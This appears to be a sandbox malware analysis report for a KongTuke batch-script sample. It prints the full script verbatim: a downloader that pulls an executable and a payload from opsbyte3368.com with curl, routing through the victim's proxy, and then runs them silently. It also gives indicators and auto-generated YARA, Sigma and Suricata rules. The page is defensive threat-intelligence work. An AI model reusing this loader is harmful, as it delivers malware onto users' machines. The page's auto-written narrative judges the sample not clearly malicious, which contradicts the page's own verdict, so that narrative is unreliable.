Malicious
80/100
10 points past the malicious line at 70.
Why this verdict
- MalwareBazaar known sample: KongTuke
- Known malicious hash (feed): malwarebazaar: n/a
Analysis layers
Structure
What the file is made of: headers, imports, how it was built and whether it was signed.
Sections & resources
How the file is laid out in memory, and what is embedded in it: section roles, access rights, entropy and every resource entry.
Signatures & packing
What matched and what is hidden: YARA rules, capa capabilities, family attribution, packer detection, unpacked payloads and recovered configuration.
Strings
The readable content: embedded secrets, flagged strings and everything extraction recovered.
Code
What the sample would execute: the emulated API call sequence, and the disassembled entry point.
Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.
File content
13 lines · 1.2 KBThe sample verbatim, shown as inert text - nothing here is interpreted by this page.
set d=%appdata%
echo begin>"%d%\bat.txt"
set _h=https://opsbyte3368.com/healthz
set _pe=0
for /f "tokens=3" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable 2^>nul ^| findstr "0x1"') do set _pe=1
if "%_pe%"=="1" for /f "tokens=2,*" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer 2^>nul ^| find "REG_SZ"') do set "_p=%b"
if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1) else (curl -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1)
if exist "%d%\TRegSvr.exe" (echo exe ok>>"%d%\bat.txt") else (echo exe no>>"%d%\bat.txt"&exit 1)
if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1) else (curl -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1)
if exist "%d%\vclimg370.bpl" (echo bpl ok>>"%d%\bat.txt") else (echo bpl no>>"%d%\bat.txt"&exit 1)
echo N6Ak6OEK opsbyte3368.com>"%d%\t"
cd /d "%d%"
start /b "" "%d%\TRegSvr.exe" -q "%d%\vclimg370.bpl"
Extracted strings
showing 13- set d=%appdata%
- echo begin>"%d%\bat.txt"
- set _h=https://opsbyte3368.com/healthz
- set _pe=0
- for /f "tokens=3" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable 2^>nul ^| findstr "0x1"') do set _pe=1
- if "%_pe%"=="1" for /f "tokens=2,*" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer 2^>nul ^| find "REG_SZ"') do set "_p=%b"
- if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1) else (curl -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1)
- if exist "%d%\TRegSvr.exe" (echo exe ok>>"%d%\bat.txt") else (echo exe no>>"%d%\bat.txt"&exit 1)
- if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1) else (curl -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1)
- if exist "%d%\vclimg370.bpl" (echo bpl ok>>"%d%\bat.txt") else (echo bpl no>>"%d%\bat.txt"&exit 1)
- echo N6Ak6OEK opsbyte3368.com>"%d%\t"
- cd /d "%d%"
- start /b "" "%d%\TRegSvr.exe" -q "%d%\vclimg370.bpl"
No strings match this filter.
Stack and decoded strings were not recovered: this file format is not eligible for string emulation. Only literal strings present in the file are listed above.
Nothing in this view
This sample produced no results for this part of the static analysis.
Screen recording
8 frames · screen recording · 134sBehavior summary
ran 134sno notable behavior observed
No WMI attributed to the sample. The WMI-Activity trace was running and recorded 930 operations on the machine during the run; none of them came from the sample's process tree.
No network activity - the run was isolated
This detonation was given no internet connection, so a sample that wanted to reach out could not. An empty section here says nothing about whether it tried.
Process tree
What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.
No processes were captured
This run recorded no process activity. A hash lookup and a URL analysis never open a Windows VM, and a detonation that produced no telemetry says so on the report.
Established mechanisms
cleanNo persistence established
None of the 90 auto-start methods below were established during this run.
Detection coverage
0 / 90Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.
- Active Setup Installed Component T1547.014 clean
- Explorer Delay-Load Object T1547.001 clean
- Explorer Run Key T1547.001 clean
- Explorer SharedTaskScheduler T1547.001 clean
- Group Policy Extension DLL T1547.004 clean
- Group Policy Run Key T1547.001 clean
- Logon Script T1037.001 clean
- RDP WDS Startup Program T1547.001 clean
- Registry Run Key T1547.001 clean
- Registry RunEx Key T1547.001 clean
- Registry RunOnce Key T1547.001 clean
- Registry RunOnceEx Key T1547.001 clean
- Registry RunServices Key T1547.001 clean
- Startup Folder Item T1547.001 clean
- Startup Folder Redirection T1547.001 clean
- Terminal Services Initial Program T1547.001 clean
- Winlogon GINA DLL T1547.004 clean
- Winlogon MPNotify Value T1547.004 clean
- Winlogon Notify Package T1547.004 clean
- Winlogon Shell Value T1547.004 clean
- Winlogon Taskman Value T1547.004 clean
- Winlogon Userinit Value T1547.004 clean
- BITS Job T1197 clean
- Print Monitor DLL T1547.010 clean
- Print Processor DLL T1547.012 clean
- Scheduled Task T1053.005 clean
- Scheduled Task Registry Implant T1053.005 clean
- Service Control Manager Security Descriptor T1574.011 clean
- Service DLL Hijack T1543.003 clean
- Time Provider DLL T1547.003 clean
- Windows Service Creation T1543.003 clean
- .NET Managed Debugger T1546.012 clean
- Accessibility Tool Hijack T1546.008 clean
- AeDebug Postmortem Debugger T1546.012 clean
- App Paths Hijack T1546.012 clean
- Application Shim Database T1546.011 clean
- Boot Verification Program T1547.002 clean
- Command Processor AutoRun T1546.011 clean
- Explorer Load Value T1547.001 clean
- Explorer MyComputer Tool Hijack T1546.001 clean
- Registry Image File Execution Options T1546.012 clean
- Screensaver Hijack T1546.002 clean
- Setup ErrorHandler Script T1546 clean
- Shell Open Command Hijack T1546.001 clean
- SilentProcessExit Monitor T1546.012 clean
- Telemetry Controller Command T1546.015 clean
- WER ReflectDebugger T1546.012 clean
- Windows Error Reporting Debugger T1546.012 clean
- .NET CLR Profiler DLL T1574.012 clean
- .NET Startup Hook DLL T1574 clean
- AppCert DLLs T1546.009 clean
- AppInit DLLs T1546.010 clean
- AutodialDLL Winsock Injection T1546.006 clean
- DLL Search-Order Hijack T1574.001 T1574.002 clean
- DNS Server Plugin DLL T1574.001 clean
- HTML Help Helper DLL T1546 clean
- KnownDLLs Manipulation T1574.001 clean
- Natural Language Platform DLL Override T1546 clean
- Netsh Helper DLL T1546.007 clean
- Winsock Layered Service Provider T1546.006 clean
- Browser Extension T1176 clean
- Browser Helper Object T1176 clean
- COM Server Hijack T1546.015 clean
- HTML Help COM Object Hijack T1546.015 clean
- Shell Context Menu Handler T1546.001 clean
- Shell Extension Handler T1546.001 clean
- Account RID Hijack T1098 clean
- AMSI Provider T1562.001 clean
- Credential Provider T1547.014 clean
- DSRM Admin Logon Backdoor T1556 clean
- Hidden Local Account T1136.001 clean
- LSA Authentication Package T1547.002 clean
- LSA Extension DLL T1547.005 clean
- LSA Notification Package T1547.005 clean
- LSA Security Package T1547.005 clean
- Network Provider DLL T1556.008 clean
- Security Support Provider T1547.005 clean
- Netsh Port Proxy T1090.001 clean
- Office Add-in T1137.006 clean
- Office Executable Sideload T1574.002 clean
- Office Startup Template T1137.001 clean
- Office Test Key T1137.002 clean
- Power Automate Flow T1546 clean
- PowerShell Profile T1546.013 clean
- Windows Terminal Startup Action T1546 clean
- WMI Event Subscription T1546.003 clean
- BootExecute Native Image T1547.002 clean
- PlatformExecute Native Image T1547.002 clean
- SetupExecute Native Image T1547.002 clean
- UEFI / Bootkit Artifact T1542.003 T1542.001 clean
File activity summary
File & registry ops
0 file · 2 registry · sample scope
| Operation | Target | Process |
|---|---|---|
| create |
Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters
|
- pid 3880 |
| setvalue |
Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters
TrapPollTimeMilliSecs = 15000
read back
|
- |
No operations match your filter.
File reputation
2 of 7 listed| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| MalwareBazaar | File hash | KongTuke | ps1 | live lookup |
| MalwareBazaar hash feed | File hash | listed | malwarebazaar: KongTuke | 2,535 records 51 minutes ago |
| filescan.io | File hash | suspicious (0/17 engines) - below the scoring threshold | - | live lookup |
| MalwareBazaar ransomware feed | File hash | clean | not in feed | 8,271 records 5 hours ago |
| ThreatFox hash IOCs | File hash | clean | not in feed | 1,632 records 52 minutes ago |
| URLhaus payload hashes | File hash | clean | not in feed | 1,474 records 51 minutes ago |
| VirusTotal | File hash | clean | - | live lookup |
Hash lookups only - the sample itself is never uploaded to any third party.
Network indicators
8 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| blocklist.de | IP / domain / URL | clean | 3 observed indicators, none listed | 24.5k records 51 minutes ago |
| CINS Army | IP / domain / URL | clean | 3 observed indicators, none listed | 15k records 51 minutes ago |
| Emerging Threats | IP / domain / URL | clean | 3 observed indicators, none listed | 580 records 51 minutes ago |
| Feodo Tracker | IP / domain / URL | clean | 3 observed indicators, none listed | 5 records 52 minutes ago |
| IPsum | IP / domain / URL | clean | 3 observed indicators, none listed | 17.7k records 51 minutes ago |
| Phishing.Database | IP / domain / URL | clean | 3 observed indicators, none listed | 391.1k records 5 hours ago |
| ThreatFox | IP / domain / URL | clean | 3 observed indicators, none listed | 1,632 records 52 minutes ago |
| URLhaus | IP / domain / URL | clean | 3 observed indicators, none listed | 5,155 records 51 minutes ago |
TLS fingerprints
0 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| abuse.ch JA3 blocklist | JA3 / JA4 | not checked | no TLS client fingerprint observed | 97 records 17 hours ago |
| SSL blocklist | JA3 / JA4 | not checked | no TLS client fingerprint observed | 10.7k records 52 minutes ago |
Detection rules
2 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| Sigma rules | Behavior log | clean | - | 2,275 records 23 hours ago |
| YARA rules | Sample content | clean | no rule matched | 110 records 52 minutes ago |
Tooling catalogs
3 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| LOLBootloaders | File hash | clean | not a known vulnerable bootloader | 520 records 51 minutes ago |
| LOLDrivers | File hash | clean | not a known vulnerable driver | 2,306 records 52 minutes ago |
| LOLRMM | Names and domains | clean | 1 name/domain indicator checked, no remote-management tooling | 322 records 51 minutes ago |
| LOLBAS | Process image paths | not checked | no process image path observed to check | 244 records 52 minutes ago |
Analyst narrative
The analysis of the sample indicates that it successfully executed within the sandbox environment. 1. **Initial Access**: The sample does not exhibit any clear indicators of initial access mechanisms such as exploitation of vulnerabilities or phishing attempts. However, the presence of URLs suggests potential communication with external servers. 2. **Execution**: The sample was executed, and while no notable behavior was observed during its runtime, it did interact with the Windows registry. Specifically, it created and modified a registry key under `Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters`, which may indicate an attempt to configure settings related to network management. 3. **Persistence**: There are no direct indicators of persistence mechanisms employed by the sample. The registry operations observed do not suggest a typical persistence strategy. 4. **Defense Evasion**: There are no explicit defense evasion techniques noted in the behavior summary. The sample did not exhibit any behaviors that would typically be associated with evading detection. 5. **Command and Control (C2)**: The presence of multiple URLs (hxxps://opsbyte3368.com) indicates potential command and control infrastructure. However, there is no evidence of successful communication or data exfiltration. 6. **Impact**: The impact of the sample remains unclear due to the lack of notable behavior during execution. The registry modifications could imply an intent to affect system behavior, but without further context, the actual impact cannot be determined. **Verdict Rationale**: The sample executed without triggering any significant malicious behavior, and while it did interact with the registry, the overall lack of notable actions and the absence of malicious indicators lead to a conclusion that the sample does not exhibit clear malicious intent. However, the presence of C2 URLs warrants further investigation.
Evasion analysis
No evasive checkpoints detected.
Network indicators
3| Severity | Type | Indicator | Description |
|---|---|---|---|
| info | url | https://opsbyte3368.com/healthz | Extracted from the sample's strings |
| info | url | https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e | Extracted from the sample's strings |
| info | url | https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b | Extracted from the sample's strings |
File indicators
2| Severity | Type | Indicator | Description |
|---|---|---|---|
| malicious | sample_sha256 | 62c5643a4d1ac485180b4fdcb79cb29119fcef3b42c5a7fbb5ab4d8cedae4866 | Submitted sample (SHA256) |
| malicious | sample_md5 | 1041afed2c77edc30cf1fe56fb6a8856 | Submitted sample (MD5) |
Sigma detections
0 matches of 2275 rulesThe Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.
Generated rules
Sigma: auto_file_2387_sigma_reg
Auto-generatedtitle: Auto-generated registry behavior rule (sandbox scan 2387)
id: sandbox-auto-2387-reg
status: experimental
description: Auto-generated from sandbox scan 2387
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains:
- 'Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters'
condition: selection
level: mediumSuricata/Snort: auto_file_2387_suricata
Auto-generatedalert http any any -> any any (msg:"sandbox auto scan 2387 C2 URL"; http.uri; content:"/healthz"; sid:15978368; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2387 C2 URL"; http.uri; content:"/ue?t=N6Ak6OEK&f=e"; sid:15978369; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2387 C2 URL"; http.uri; content:"/ue?t=N6Ak6OEK&f=b"; sid:15978370; rev:1;)
YARA: auto_file_2387_yara
Auto-generatedrule auto_file_2387_yara
{
meta:
description = "Auto-generated from scan 2387"
author = "sandbox auto-generator"
anchors = "5 independent regions"
strings:
$s0 = "start /b \"\" \"%d%\\TRegSvr.exe\" -q \"%d%\\vclimg370.bpl\"" ascii fullword
$s1 = "echo N6Ak6OEK opsbyte3368.com>\"%d%\\t\"" ascii fullword
$s2 = "set _h=https://opsbyte3368.com/healthz" ascii fullword
$s3 = "echo begin>\"%d%\\bat.txt\"" ascii fullword
$s4 = "set _pe=0" ascii fullword
condition:
filesize < 65536 and all of them
}Extracted files
What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.
No extracted files
Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.
Export & download
/s/2387The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.
AI analysis report
An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).
Headers
Body
Headers
Body
You are about to download the raw, live sample. It is real, potentially destructive malware and can harm your machine if opened or run. Only handle it inside an isolated analysis environment.
Delivered as a ZIP encrypted with the password infected so the bytes are never handled unprotected.
Report this analysis
Analysis reports are produced automatically from files, addresses and text submitted by visitors. If this one publishes your material, identifies you, or should not be public for any other reason, tell us why and an administrator will review it.
Public analyses of this file
1 run| Submitted | Environment | Verdict | Score |
|---|---|---|---|
| 2026-09-07 21:46 Shown below | Static analysis | Malicious | 80/100 |